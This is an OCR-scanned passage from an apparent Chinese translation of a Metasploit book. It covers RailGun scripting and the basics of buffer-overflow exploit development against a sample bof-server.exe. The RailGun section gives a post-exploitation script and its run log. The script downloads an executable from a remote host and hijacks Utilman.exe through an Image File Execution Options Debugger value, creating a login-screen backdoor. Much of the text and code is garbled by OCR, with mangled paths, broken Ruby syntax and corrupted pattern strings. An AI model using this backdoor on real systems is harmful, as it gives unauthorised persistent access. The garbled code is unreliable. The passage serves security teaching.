的 库 文 件 类 似 ， 它 也 包含 了 很 多 方法 。 如 果 想 学 习 Windows API 调 用 ， 可 以 访问 http:/source. 
winehq.org/WineAPIL/ 和 http://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).aspx, 
其 中 有 许多 优秀 的 学 习 资 料 。 建 议 在 深入 学 习 RailGun 脚 本 的 创建 之 前 ， 先 多 熟悉 一 下 各 种 API 
调用 。 


人 有 关 了 RailGun 支 持 的 DLL 文件 的 更 多 信息 , 请 参考 以 下 路 径 : /usrshare/Metasploit- 
framework/lib/rex/post/meterpreter/extensions/stdapi/RailGun/def., 
2.4.4 构建 复杂 的 RailGun 脚本 


现在 开始 更 深入 地 学 习 使 用 RailGun 来 编写 Meterpreter 的 扩展 模块 。 首 先 创建 一 个 脚本 , 这 个 
脚本 会 将 一 个 自 定义 名 称 的 DLL 文件 添加 到 Metasploit 的 界面 中 。 


if client.railgun.get dll('urlmon') -- nil 

print status("Adding Function") 

end 

client.railgun.add dll('urlmon','C:NNWWINDOWSNNsystem32NNurlmon.dll') 
client.railgun.add function('urlmon','URLDownloadToFileA',' 'DWORD',[ 
["DWORD","pcaller","in"], 

"PCHAR","SZzURL","in"], 

"PCHAR","szFileName","in"], 

"DWORD","Reserved","in"], 

"DWORD","lpfnCB","in"], 

) 


将 这 段 代码 以 urlmon.rb 为 名 保存 到 目录 /scripts/meterpreter 中 。 


这 段 代 码 给 文件 C:NWINDOWSNsystem32Nurlmon.dl 添 加 了 一 个 引用 路 径 。 这 个 文件 包含 了 
访问 一 个 URL 需 要 用 到 的 所 有 功能 ， 以 及 一 些 其 他 功能 ， 比 如 下 载 某 个 特定 文件 。 我 们 将 引用 的 
路 径 保存 在 了 名 称 urlmon 中 。 接 着 ， 将 一 个 自 定 义 函 数 添加 到 DLL 文件 中 ， 使 用 DLL 文件 的 名 
称 作为 第 一 个 参数 ， 使 用 我 们 即将 创造 的 那个 自 定义 函数 名 作为 第 二 个 参数 ， 这 个 参数 是 
URLDownloadToFileA, 第 一 行 的 代码 用 来 检查 DLL 函数 是 否 已 经 在 DLL 文件 中 存在 。 如 果 已 经 
存在 ， 脚 本 就 不 会 再 一 次 添加 函数 。 如 果 调 用 的 应 用 程序 不 是 一 个 ActiveX 组 件 ， 参 数 pcaller 
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将 被 设置 为 NULL。 如 果 是 一 个 ActiveX 组 件 ， 则 将 被 设置 为 COM 对 象 。 参 数 szURL 指 定 了 要 下 载 
的 URL。 参数 szFileName 指 明了 从 指定 URL 下 载 的 文件 名 。 参数 Reserved 通 常 被 设置 为 NULL， 
而 lpfnCB 用 来 处 理 下 载 的 状态 。 人 然而， 如 果 并 不 需要 状态 值 的 话 ， 这 个 值 将 被 设置 为 NULL。 


现在 创建 男 一 个 脚本 ,这 个 脚本 将 会 使 用 这 个 函数 。 我 们 要 创建 一 个 后 渗透 模块 ,这 个 模块 
的 作用 是 下 载 一 个 免费 的 文件 管理 器 ， 并 且 修改 Windows 操 作 系统 中 的 辅助 工具 管理 需 〈utility 
manager) 的 入 口 值 。 因 此 ， 每 当 我 们 要 调用 辅助 工具 管理 器 的 时 候 ， 运 行 的 其 实 都 是 刚才 下 载 
的 文件 管理 需 。 


在 相同 的 目录 下 创建 一 个 名 为 railgun-demo.rb 的 脚本 ， 内 容 如 下 。 


client.railgun.urlmon.URLDownloadTOoFileA(0,"http://192.168.1.10 
/A43.exe","C:NNWWindowsNNSystem32NNa43.exe",0,0) 
key-"HKLMNNSOFTWARENMMicrosoftNNWindows NTNNCurrentVersionNMImage File 
Execution Options NNUtilman.exe" 

SysSkey-registry. createkey (key) 

registry setvaldata(key,'Debugger','a43.exe', 'REG SZ') 


PRI BIA FE, BASBUSS— £1 2:5 H]urlmonX fF rHJURLDownloaaTorilerRZi A Hr 
需要 的 参数 。 


接 下 来 ， 在 父 键 HKLM\SOFTWARE\Microsoft\Windows NT CurrentVersionlmage File Excuion 
Options\ 下 面 创建 一 个 新 的 Utilman.exe 键 。 


在 utilman.exe 键 下 面 再 建立 一 个 名 为 Debugger 的 REG_Sz 类 型 的 注册 表 值 。 最 后 将 a43.exe 赋 
值 给 Debugger。 


我 们 从 Meterpreter 运 行 这 个 脚本 ， 看 看 这 一 切 是 如 何 运 转 的 。 


meterpreter > run urlmon 

[*] Adding Function 

meterpreter » getsystem 

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 
meterpreter » run railgun demo 

meterpreter > |l 


运行 脚本 railgun _ demo 之 后 ， 就 会 使 用 urlmon.dlI 下 载 文 件 管理 器 ， 并 将 这 个 文件 管理 器 放置 
在 system32 目 录 中 。 接 下 来 ， 创 建 一 个 将 辅助 工具 管理 器 替换 为 a43.exe 的 注册 表 键 。 因 此 ， 当 有 
人 在 登录 屏幕 上 按 下 访问 按钮 的 时 候 ， 不 会 出 现 文件 管理 器 ， 而 是 出 现 一 个 a43 文 件 管理 器 。 这 
个 文件 管理 器 将 成 为 目标 系统 登录 屏幕 上 的 一 个 后 门 。 


好 了 ,来 看 看 在 登录 界面 中 按 下 轻松 访问 按钮 (ease of access button) 会 发 生 什 么 。 结 果 如 
下 图 所 示 。 
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i. Windows / Home Basic 


可 以 看 到 ， 现 在 出 现 的 是 一 个 a43 文 件 管理 咒 ， 而 不 是 本 该 出 现 的 辅助 工具 管理 咒 。 我 们 现 
在 无 须 登 录 ， 就 可 以 实现 各 种 功能 ， 比 如 说 修改 注册 表 、 使 用 CMD 命 令 行 以 及 各 种 各 样 的 操作 。 
现在 你 见识 到 RailGun 的 威力 了 吧 ， 它 可 以 帮助 你 轻松 地 访问 任何 一 个 DLL 文件 ， 而 且 人 允许 你 向 
其 添加 自 定 义 的 模块 。 


ED 有 关 此 DLL 函数 的 更 多 信息 ， 请 访问 http://msdn.microsoft.comy/en-us/library/ 
ms775123(v-vs.85).aspx. 


2.5 小结 


这 一 章 介 绍 了 Metasploit 模 块 的 编写 。 介 绍 了 Metasploit 的 模块 、 后 渗透 模块 脚本 、Meterpreter、 
RailGun 以 及 Ruby 程 序 的 编写 。 通 过 这 一 章 , 我 们 学 会 了 如 何 将 自 定义 函数 添加 到 Metasploit 框 架 
中 , 这 使 得 本 来 就 十 分 强大 的 框架 如 虎 添 轰 。 我 们 熟悉 了 Ruby 编 程 语言 的 基础 知识 , 学 习 了 辅助 
模块 、 后 渗透 模块 以 及 Meterpreter 扩 展 模块 的 代码 编写 。 也 讨论 了 如 何 利 用 RailGun 的 自 定义 函数 
添加 功能 ， 例 如 添加 一 个 DLL 文 件 ， 或 者 向 目标 的 DLL 文 件 中 添加 一 个 自 定义 函数 。 


下 一 章 将 介绍 Metasploit 中 的 渗透 模块 的 开发 。 我 们 将 会 开发 一 个 自 定义 渗透 模块 ， 对 漏洞 
进行 各 种 名 zz 测试 ， 渗 透 目标 软件 ， 以 及 编写 针对 应 用 程序 和 Web 的 高 级 渗透 模块 。 


渗透 模块 的 开发 过 程 


“如 果 说 调试 是 消除 bug 的 过 程 ， 那 么 编程 就 是 产生 bug 的 过 程 。” 
— —Edsger W. Dijkstra 


学 习 渗 透 模块 开发 主要 是 研究 渗透 模块 的 组 成 部 分 以 及 制作 过 程 。 本章 将 会 介绍 各 种 漏洞 , 并 
会 尝试 使 用 各 种 方法 和 途径 去 对 这 些 漏洞 进行 渗透 。 除 此 之 外 , 重点 将 放 在 渗透 模块 的 开发 上 。 本 
章 还 会 涵盖 各 种 用 来 辅助 Metasploit 编 写 渗透 模块 的 工具 。 不 过 ， 掌 握 计 算 机 的 架构 是 编写 渗透 模 
块 的 一 个 重要 前 提 条 件 。 如 果 对 计算 机 的 架构 一 穿 不 通 , 将 无 法 理解 这 一 切 到 底 是 如 何 运作 的 。 因 
此 ， 我 们 首先 学 习 计 算 机 的 架构 和 开发 渗透 模块 的 基本 要 素 。 


本 章 将 着 眼 于 以 下 几 个 要 点 。 


a 渗透 模块 开发 过 程 的 各 个 阶段 。 

口 编写 渗透 模块 时 要 使 用 的 参数 。 

O 各 种 寄存 器 的 工作 方式 。 

口 如 何 对 软件 进行 包 zz 测 试 。 

口 如 何在 Metasploit 框 架 中 编写 渗透 模块 。 
口 使 用 Metasploit 绕 过 保护 机 制 的 过 程 。 


3.4 渗透 的 最 基础 部 分 


这 一 节 将 着 眼 于 渗透 最 重要 的 组 成 部 分 ,同时 也 将 就 不 同 架构 中 的 各 种 寡 存 器 进行 研究 。 我 
们 将 详细 讨论 指令 指针 寄存 器 ( Extended Instruction Pointer, EIP ) 和 栈 指针 寄存 器 ( Extended Stack 
Pointer, ESP )， 以 及 它们 在 渗透 模块 编写 中 的 重要 作用 。 另 外 ， 空 操作 〈No operation, NOP ) 
指令 和 跳 转 (Jump, MP ) 指令 以 及 它们 在 编写 各 种 软件 的 渗透 模块 中 的 重要 作用 ,也 是 将 要 学 
习 的 内 容 。 


3.1.1 基础 部 分 
首先 了 解 一 下 编写 渗透 模块 所 必需 的 基础 部 分 。 


下 列 术 语 都 是 基于 硬件 特性 、 软 件 特性 以 及 渗透 的 角度 。 

O 寄存 器 (register); 这 是 处 理 器 上 用 来 存储 信息 的 一 块 区 域 。 此 外 ， 处 理 需 利用 寄存 央 来 

处 理 进 程 执行 、 内 存 操作 、API 调 用 等 。 

O x86: 这 是 一 个 主要 应 用 在 Intel 平 台 上 的 系统 架构 ， 通 常 是 32 位 操作 系统 ， 而 x64 是 指 64 

位 操作 系统 。 

口 汇编 语言 (assembly language ): 这 是 一 种 低级 编程 语言 。 汇 编 语 言 操 作 起 来 十 分 简单 。 

但 是 对 汇编 语言 的 阅读 或 者 维护 工作 则 是 一 块 难 哺 的 骨头 。 

O 缓冲 区 (buffer): 缓冲 区 指 的 是 程序 中 用 来 存储 数据 的 一 段 固 定 的 内 存 空 间 。 通 常 它 会 

栈 或 者 堆 的 形式 保存 数据 ， 这 取决 于 其 所 使 用 的 存储 空间 类 型 。 

口 调试 器 (debugger ): 调试 器 允许 对 可 执行 文件 进行 逐步 分 析 ， 包 括 对 存储 器 、 寄 存 器 、 
栈 等 设备 的 停止 .重启 .中 断 以 及 控制 等 操作 。 目 前 使 用 比较 广泛 的 调试 器 主要 有 immunity 
调试 器 、GDB 和 OllyDbg。 

口 ShellCode: 这 是 一 段 用 于 在 目标 系统 上 执行 的 机 器 语言 。 过 去 ， 它 总 是 被 用 来 执行 一 个 
可 以 赋予 攻击 者 访问 目标 系统 权限 的 shell 进 程 。 所 以 ，ShellCode 就 是 一 组 可 以 被 处 理 需 
理解 的 指令 。 

口 栈 (stack): 栈 充 当 着 数据 占 位 符 的 角色 ， 通 常 使 用 后 进 先 出 (Last in First out, LIFO ) 

的 存储 方法 ， 也 就 是 说 最 后 进入 的 会 最 先 被 移 除 。 

O 缓冲 区 溢出 (buffer overfow ): 这 个 概念 通常 是 指向 缓冲 区 中 存放 了 太 多 的 数据 ， 超 出 了 

缓冲 区 的 范围 。 

O 格式 字符 串 错误 (format string bug): 这 是 一 些 在 使 用 print 系 列 语句 对 文件 或 者 命令 行 中 
的 文本 进行 处 理 时 出 现 的 错误 。 在 输入 一 组 特定 数据 的 时 候 ， 该 错误 的 存在 会 导致 程序 
中 重要 信息 的 泄露 。 

OQ 系统 调用 ( system call): 程序 在 执行 的 时 候 调 用 了 操作 系统 提供 的 方法 。 


3.1.2 计算 机 架构 

计算 机 的 架构 定义 了 系统 是 如 何 由 各 个 组 成 部 分 组 织 而 成 的 。 首 先 了 解 基本 的 组 成 部 分 ， 然 
后 再 深入 学 习 高 级 部 分 。 

系统 组 织 基 础 


在 开始 编写 程序 和 完成 调试 之 类 的 任务 之 前 , 首先 来 了 解 一 下 系统 的 各 个 组 成 部 分 是 如 何 组 
织 在 一 起 的 。 关 于 这 个 内 容 先 来 看 下 面 这 张 图 。 


£ 
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可 以 清楚 地 看 到 ， 系统 中 各 个 主要 部 分 都 是 通过 系统 总 线 连 接 的 。 因 此 ,CPU、 内 存 和 输入 
输出 设备 之 间 的 每 一 次 通信 都 需要 通过 系统 总 线 。 


CPU 作 为 系统 的 中 央 人 处 理 单元 , 是 系统 中 最 重要 的 组 成 部 分 。 可 以 根据 下 图 来 了 解 CPU 中 的 
各 个 组 成 部 分 以 及 它们 的 组 织 形式 。 


控制 单元 -= 


上 图 中 显示 了 CPU 的 基本 组 成 部 分 , 例如 控制 单元 ( Control Unit, CU )、 执行 单元 (Execution 
Unit，EU )、 寡 存 器 以 及 标志 ( Flag )。 接 下 来 通过 阅读 下 表 来 了 解 一 下 各 个 部 分 的 功能 。 


组 成 部 分 功 能 

控制 单元 主要 是 负责 对 指令 的 接收 和 译 码 工作 ， 并 将 数据 存储 到 内 存 中 
执行 单元 完成 了 真正 的 执行 过 程 

寄存 器 是 用 来 辅助 系统 执行 的 一 个 存储 组 件 

标志 用 来 在 系统 执行 时 标识 事件 


3.4.3 ”寄存 器 


寄存 器 是 一 种 高 速 计算 机 内 存 组 件 。 它 的 速度 位 于 所 有 存储 设备 速度 列表 的 最 顶端 。 通 常 使 
用 能 同时 处 理 的 比特 位 数 作为 寄存 器 的 衡量 标准 , 例如 8 位 寄存 器 和 32 位 寄存 器 能 分 别 同 时 处 理 8 
位 和 32 位 的 存储 单元 。 通 用 寄存 器 、 段 寄存 器 、 标 志 寄存 器 、 索 引 寄 存 器 都 是 系统 中 不 同类 型 的 


寄存 器 。 它 们 几乎 完成 了 系统 全 部 的 功能 ， 因 为 在 它们 内 部 保存 了 所 有 要 处 理 的 数据 。 现 在 让 我 
们 来 仔细 看 看 这 些 寄存 器 以 及 它们 的 作用 。 


寄 存 器 A B 

EAX 这 是 一 个 用 来 存储 数据 和 操作 数 的 累加 器 ， 大 小 为 32 位 

EBX 这 是 一 个 基地 址 寄存 器 ， 同 时 也 是 一 个 指向 数据 的 指针 ， 大 小 为 32 位 

ECX 这 是 一 个 以 实现 循环 为 目的 的 计数 器 ， 大 小 为 32 位 

EDX 这 是 一 个 用 来 保存 IO 指针 的 数据 寄存 器 ， 大 小 为 32 位 

ESI/EDI 两 者 都 是 索引 寄存 器 ， 用 作 内 存 运 算 时 的 数据 指针 ， 大 小 为 32 位 

ESP 这 个 寄存 器 中 保存 了 栈 顶 的 位 置 ， 每 当 有 元 素 进 栈 或 出 栈 的 时 候 ，ESP 的 值 都 会 发 生 
改变 ， 大 小 为 32 位 。 

EBP 这 是 一 个 栈 数据 指针 寄存 器 ， 大 小 为 32 位 

EIP 这 是 指令 指针 ， 大 小 为 32 位 ， 是 本 章 中 最 重要 的 一 个 指针 。 它 保存 了 要 执行 的 下 一 指 


SS、DS、ES、CS、FS 和 GS 


令 的 地 址 
这 些 都 是 段 寄 存 器 ， 大 小 为 16 位 
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有 关 架 构 的 基本 知识 以 及 用 于 渗透 模块 的 各 种 系统 调用 和 指令 的 更 多 信 
息 ， 请 访问 http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit- 
development/Zx86 , 
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缓冲 区 洪 出 是 一 个 程序 执行 中 的 异常 , 即 向 缓冲 区 中 写 入 数据 时 , 这 些 数据 超出 了 缓冲 区 的 
大 小 并 且 获 盖 了 内 存 地 址 。 下 图 给 出 了 一 个 非常 简单 的 缓冲 区 溢出 漏洞 。 


0x00000000 0x00000000 3 o 


ESP: 栈 顶 指针 


保存 变量 的 空间 


保存 EIP 
程序 无 法 找到 


下 一 条 指令 的 


-— i 


OxFFFFFFFF OxFFFFFFFF 


上 图 的 左 半 部 分 显示 了 一 个 程序 的 结构 , 右 半 部 分 则 显示 了 当 满 足 缓冲 区 溢出 条 件 时 程序 的 
表现 。 


但 是 如 何 才能 利用 这 个 缓冲 区 溢出 漏洞 呢 ” 答案 其 实 很 简单 。 如 果 我 们 知道 了 用 来 保存 EIP 
的 起 始 地 址 前 面 的 数据 长 度 ， 那 么 就 可 以 将 任意 数据 保存 到 原来 EIP 的 位 置 ， 从 而 控制 所 要 执行 
的 下 一 条 指令 的 地 址 。 因 此 ， 我 们 要 做 的 第 一 件 事情 就 是 确定 和 覆盖 EIP 前 面 的 所 有 数据 所 需要 的 
准确 字 节 数量 。 在 接 下 来 的 内 容 中 ,我们 将 看 到 如 何 使 用 Metasploit 来 确定 这 个 数量 。 
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3.2.1 使 一 个 有 漏洞 的 程序 朋 溃 


首先 下 载 一 个 使 用 了 有 漏洞 的 函数 编写 的 程序 。 这 一 节 将 会 尝试 让 这 个 程序 崩溃 。 先 在 命令 


行 中 运行 这 个 程序 。 


c C:\WINDOWS\system32\cmd.exe - bof-server.exe 200 


icrosoft Windows XP [Uersion 5.1.26001 
<C) Copyright 1985-2801 Microsoft Corp. 


*NDocuments and Settings*fidministrator?5cd Desktop 


*NDocuments and Settings*fidministrator*Desktop?5bof-seruer.exe 208 
[19281 192.168.18.104 connected 


E 


可 以 看 到 ， 这 个 小 程序 在 200 端 口上 提供 TCP 服 务 。 向 这 个 200 端 口 执行 TELNET 连 接 ， 然 后 


提供 随机 数据 ， 这 个 过 程 如 下 图 所 示 。 


í 13 
画 Telnet 192.168.10.104 t-10 ks 


> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAAAAAANAA| 二 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ma 


提供 了 这 些 数据 之 后 ,与 目标 的 连接 便 断 开 了 , 这 是 因为 目标 应 用 服务 器 已 经 崩溃 。 来 看 一 


下 在 目标 服务 器 上 发 生 了 什么 。 


bof-server.exe 


bof-server.exe has encountered a problem and needs to 
close. We are sorry for the inconvenience. 


If you were in the middle of something, the information you were working on 
might be lost. 


Please tell Microsoft about this problem. 


We have created an error report that you can send to us. We will treat 
this report as confidential and anonymous. 


To see what data this error report contains, click here. 


Send Error Report 
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通过 单 击 click here 就 可 以 获得 一 份 错误 报告 ， 下 面 给 出 了 有 具体 的 信息 。 


bof-server.exe 


Error signature 


AppName: bof-server.exe AppVer. 0.0.0.0 — ModName: unknown 
Modwer 0.0.0.0 Offset: 41414141 


Reporting details 
This error report includes: information regarding the condition of bof-server.exe when the problem 
occurred; the operating system version and computer hardware in use; your Digital Product ID, which 
could be used to identify your license; and the Internet Protocol (IP] address of your computer. 


We do not intentionally collect your files, name, address, email address or any other form of personally 
identifiable information. However, the error report could contain customer-specific information such as 
data from open files. while this information could potentially be used to determine your identity, if 
present, it will not be used. 


The data that we collect will only be used to fix the problem. If more information is available, we will tell 
you when you report the problem. This error report will be sent using a secure connection to a database 
with limited access and will not be used for marketing purposes. 


To view technical information about the error report, click here. 


To see our data collection policy on the web, click here. Close | 


程序 无 法 在 地 址 41414141 处 找到 下 一 条 要 执行 的 指令 , 从 而 导致 了 程序 崩溃 。 这 里 面 能 找到 
一 些 蛛 丝 马 迹 吗 ? 值 41 是 字符 A 的 16 进 制 表 示 , A 也 正 是 我 们 输入 的 字符 , 它们 超出 了 缓冲 区 的 范 
围 ， 接 着 履 盖 了 EIP 寄 存 器 。 由 于 下 一 条 指令 的 地 址 被 重 写 ， 程 序 就 试图 按照 这 个 41414141 地 址 
去 寻找 下 一 条 要 执行 的 指令 ,但 这 显然 不 是 一 个 有 效 的 地 址 ， 所 以 程序 出 演 了 。 


从 以 下 网 址 可 以 下 载 上 面 示例 中 使 用 的 程序 : http://redstack.net/blog/category/ 
How%2To.html。 


3.2.2 ”构建 渗透 模块 的 基础 
为 了 实现 对 目标 应 用 的 渗透 并 获取 目标 系统 的 权限 ， 需 要 获取 下 表 中 列 出 的 信息 。 


内 容 A B 


偏 移 量 (offset) 我 们 在 上 一 节 中 让 应 用 程序 崩溃 了 。 为 了 渗透 这 个 应 用 程序 , 需要 确定 填 满 缓冲 区 和 
EBP 寄存 器 所 需 字 节 的 准确 长 度 , 在 这 个 长 度 后 面 的 内 容 就 会 被 保存 到 EIP 寄 存 器 中 。 
我 们 将 未 填充 进 EIP 寄 存 器 的 数据 长 度 称 为 偏 移 量 

跳 转 地 址 (jump address/ret) 用 来 重 写 EDP 寄 存 器 的 一 个 地 址 ， 通 常 是 一 个 DLL 文件 的 JMP ESP 指 令 ， 可 以 让 程序 
跳 转 到 攻击 载荷 所 在 的 地 址 

坏 字 符 (bad character) 坏 字符 指 的 是 那些 可 能 导致 攻击 载 共 终止 的 字符 。 假 设 一 个 ShellCode 中 存在 null 字 节 
(0x00) , 那么 它 在 网 络 传输 的 过 程 中 就 可 能 导致 缓冲 过 里 结束, 从 而 出 现 意 想不到 的 
结果 。 应 尽量 避免 坏 字符 
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下 图 分 步骤 解释 了 渗透 过 程 。 


Buffer EIP 


JMP ESP 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Addr. ShellCode 
1. 计算 用 来 覆盖 缓冲 区 和 EBP 所 需 的 字 节 3. 用 于 去 除 不 确定 因素 的 填充 数据 和 
Xe 


对 照 上 图 ， 必 须 完成 以 下 步 又 。 

(1) 使 用 用 户 输入 填充 EIP 寄 存 器 起 始 地 址 之 前 的 缓冲 区 和 EBP 寄存 器 。 
(2) 使 用 JMP ESP 的 地 址 来 改写 EIP。 

(3) 在 攻击 载荷 之 前 提供 一 些 填充 数据 。 

(4) 删除 攻击 载荷 本 身 的 坏 字 节 。 

后 面 的 内 容 将 详细 地 介绍 这 些 步 又 。 


3.2.3 ”计算 偏 移 量 
正如 上 一 节 所 介绍 的 ， 开 发 渗透 模块 的 第 一 个 步骤 就 是 找 出 偏 移 量 。 在 这 个 过 程 中 将 使 用 


Metasploit 的 两 款 工 具 ， 分 别 是 pattern_create 和 pattern_offset。 


1. 使 用 pattern create 工 具 


在 上 一 节 中 ， 我 们 通过 输入 大 量 的 字符 A 导 致 了 目标 程序 的 骨 泪 。 不 过 现在 既然 在 研究 如 何 
构建 一 个 可 以 工作 的 渗透 模块 ， 那 么 就 必须 找 出 导致 程序 崩溃 的 具体 字符 数量 。Metasploit 内 置 
的 pattern_create 工 具 可 以 完成 这 一 工作 一 一 它 产 生 了 可 以 代替 字符 A 进 行 填充 的 字符 序列 ， 
基于 这 个 序列 就 可 以 改写 EIP 寄 存 器 中 的 值 。 通 过 使 用 对 应 的 工具 pattern_offset 可 以 找 出 准 
确 的 字 节 数量 。 下 图 给 出 了 具体 的 操作 。 
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root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern create.rb 1000 
Aa0AalAa2Aa3Aa4Aa5Aa6Aa7AaB8Aa9AbÜAblAb2Ab3AbA4Ab5Ab6Ab7Ab8Ab9ACOACIAC2AC3ACAACBAC6 
Ac7Ac8Ac9Ad0AdlAd2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7AeBAe9AfOAflAf2Af3 
AfAAf5AfGAf7Af8Af9AgO0AglAg2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0AhlAh2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0 
Ai1Ai2Ai3Ai4Ai15Ai16Ai7A18A19Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9AkO0AklAk2Ak3AkA4AK5AKk6Ak7 
/Ak8AkK9A10A11A12A13A14A15A16A17A18A19AmOAmlAm2Am3Am4Am5Am6Am7Am8Am9AnO0AnlAn2An3An4 
/AnbAn6An7An8An9A00A01A02A03AO04A05AO06AO07AOB8AO9ApOAplAp2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1 
Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9ArO0ArlAr2Ar3Ar4Ar5Ar6Ar7ArB8Ar9ASOAS1AS2AS3AsAAs5As6As7AS8 
AAS9AtOAtlAt2AtS3At4AAt5BAt6At7AtBAt9AuO0AulAu2Au3Au4Au5Au6Au7Au8Au9AvOAv1Av2Av3AvAAv5 
AAv6Av7Av8Av9AwOAw1Aw2Aw3AwAAw5Aw6Aw7AWBAW9AxOAxlAxX2AX3AxAAx5AxX6AX7AxB8Ax9AyOAylAy2 
AyS3Ay4Ay5Ay6Ay7Ay8Ay9AzO0AZlAz2Az3AzAAz5Az6Az'7Az8Az9Ba0BalBa2Ba3Ba4Ba5Ba6Ba7Ba8Ba9 
BbOBblBb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9BcOBcClBcC2Bc3BcABCSBC6BcC7BcC8Bc9BdOBdlBd2Bd3Bd4Bd5Bd6 
Bd7Bd8Bd9Be0BelBe2Be3Be4Be5Be6Be7Be8Be9BfOBflBf2Bf3BfA4Bf5Bf6Bf7Bf8Bf9BgOBglBg2Bg3 
Bg4Bg5Bg6Bg7Bg8Bg9BhOBh1lBh2B 


使 用 /tools/exploit/ 目 录 下 面 的 pattern_create.rb 脚 本 生成 一 个 1000 字 节 的 字符 序列 ， 结 果 如 上 
图 所 示 。 这 个 输出 的 序列 可 以 当 作 参数 输入 到 有 漏洞 的 应 用 程序 中 ， 如 下 图 所 示 。 


E Telnet 192.168.10.104 


> hagna1ha2ha3ha4ha5ha6ha7ha8ha9hbonb1hb2hb3hb4hbS5hb6hb7hb8hb9hconhc1hc2hc3hc4hc5| | 
hc6hc7hRc8hc9hd9hd1hd28d3h8d4hd5hd6hd7hd8hd9heghe1he2he3he4he5he6he7he8he9hfOhRf18f 
2hf3hf4hfShf6hRf7hfShf9h8908916892h93h94h95h96h97h98hg9hhonhh16h2hh3hh4hhSshh6hh7hh8h 
h9niO0nilai2ni3ni^nibnienirani80i90j0nj10j20j30j*0j580j60j 7aj80j 90kOQk10Kk20k3Ak"nk5 
Rk6Rk 7TRk88k90100118012013014815081681701881980mO8üm1Aàm20m30m4am5am6am T àm8Q0m9anORn18n 
2an3an4fnS5an6Rn?Rn88n98008001800200380*/8 0580680 780800980p0Óp18p20p38pAapSRp6efip Tap8Aa 
p98q0Rq18q28q3a8q48q58q68q?8q8aq98ar0nr18r2ar3ararsarear Tar88r98s08s18s20s38sns5 
hs6hsrhs8hs9htont1ht2ht3ht+4htSht6htr7htSht9hu0nu1hu2hu3hu4huShu6hu7huS8hu9hu0hu16u 
2AVZAVYAVSAVGAUTAVZAVIAWOAWI AWZAWZAWHAWSAWGAWTAWZAWIAXOAXI AXZAXZAXHYAXSAXGAXTAXEA 
xIAyYOAY1AYZAYZAYHAYSAYGAYTAYSAYIAZOAZIAZ2AZ3ZAZ4YAZ5SAZGAZTAZ8AZƏBa0BalBa2Ba3Ba4Ba5 
Ba6Ba?Ba8Ba9BbOBb1Bb2Bb3BbABb5Bb6Bb TBb8Bb9BcOBc 1 Bc2Bc3BcBc5Bc6Bc TBc8Bc9BdOBd1Bd 
2Bd3BdABd5Bd6Bd?Bd8Bd9BeOBe1Be2Be3Be"BebBeGBe TBe8Be9BfOBf 1l BF2BF3BFHBfSBfGBf TBF8B 
f9B90B91B92B93BgA4B95B96Bg 7B98Bg9BhOBh1Bh2B,, 


从 目标 服务 所 在 的 终端 上 可 以 看 到 偏 移 量 ， 下 面 给 出 了 该 程序 的 截图 。 


bof-server.exe 


Error signature 


AppName: bof-server.exe AppVer 00.00 — ModName: unknown 
ModVer 0000 Offset: 72413372 


Reporting details 一 
This error report includes: information regarding the condition of bof-server.exe when the problem 
occurred; the operating system version and computer hardware in use; your Digital Product ID, which 
could be used to identify your license; and the Internet Protocol (IP) address of your computer. 


We do not intentionally collect your files, name, address, email address or any other form of personally 
identifiable information. However, the error report could contain customer-specific information such as 
data from open files. While this information could potentially be used to determine your identity, if 
present, it will not be used. 


The data that we collect will only be used to fix the problem. If more information is available, we will tell 


you when you report the problem. This error report will be sent using a secure connection to a database 
with limited access and will not be used for marketing purposes. 


To view technical information about the error report, click here. 


To see our data collection policy on the web, click here. 
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我 们 发 现 了 是 72413372 履 盖 了 EIP 寄 存 器 的 地 址 。 

2. 使 用 pattern_offset 工 具 

在 上 一 节 中 ， 我 们 已 经 得 知 用 来 改写 ETIP 内 容 的 地 址 为 72413372。 接 下 来 ， 使 用 pattern_ 
offset 工 具 来 计算 改写 BITP 所 需 的 确切 字 节 数量 。 这 个 工具 需要 两 个 参数 , 第 一 个 是 地 址 , 第 二 
个 是 长 度 这 个 值 是 1000, 也 就 是 使 用 pattern_create 产 生 的 字 节 序列 的 长 度 。 可 以 按照 如 
下 方法 找 出 偏 移 量 。 


root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern offset.rb 72413372 1000 
[*] Exact match at offset 520 


